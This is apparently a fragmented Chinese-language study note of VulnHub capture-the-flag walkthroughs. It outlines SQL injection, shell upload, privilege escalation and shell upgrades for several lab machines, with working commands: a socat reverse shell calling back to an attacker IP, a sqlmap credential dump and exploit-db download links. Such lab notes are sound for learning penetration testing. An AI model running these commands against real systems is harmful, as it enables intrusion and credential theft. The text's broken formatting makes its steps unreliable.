https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project#tab=On-Line_apps
http://www.hackingarticles.in/capture-flag-challenges/
https://www.vulnhub.com/entry/hackademic-rtb1,17/
http://www.hackingarticles.in/hack-the-hackademic-rtb1-vm-boot-to-root/
sql
注入獲取 wordpress
管理員密碼,而後後臺上傳拿 shell
.php
使用python
python -c 'import pty; pty.spawn("/bin/bash")'
將 shell
轉成 tty shell
用於提權mysql
而後用linux
https://www.exploit-db.com/download/40839
提權git
轉 交互式 shell 的另外一種方式github
攻擊者的機器,監聽sql
socat file:`tty`,raw,echo=0 tcp-listen:4444
被攻擊的機器端執行,反彈 shellshell
./socat_i386_static exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.245.128:4444
https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/ https://github.com/static-linux/static-binaries-i386/blob/master/socat-2.0.0-b8.tar.gz https://github.com/andrew-d/static-binaries/tree/master/binaries/linux/x86_64
https://www.vulnhub.com/entry/de-ice-s1120,10/
http://www.hackingarticles.in/hack-the-de-ice-s1-120-vm-boot-to-root/
sql
注入獲取 數據庫用戶名和密碼數據庫
sqlmap -u http://192.168.1.120/products.php?id=1 -D mysql --users --passwords --batch
用獲取到的用戶名和密碼嘗試登錄 ssh
bash
而後用 linux-exploit-suggester
找 exp
,最後用
https://www.exploit-db.com/download/40839
拿到 root
必定按流程走,先蒐集漏洞信息,後面綜合考慮利用。
https://www.vulnhub.com/entry/pwnos-20-pre-release,34/
http://www.hackingarticles.in/hack-the-pwnos-2-0-boot-2-root-challenge/
getshell
exp
提權https://www.vulnhub.com/entry/pwnlab-init,158/
http://www.hackingarticles.in/penetration-testing-pwnlab-ctf-challenge/
php
流 獲取 php
文件內容shell
exp
提權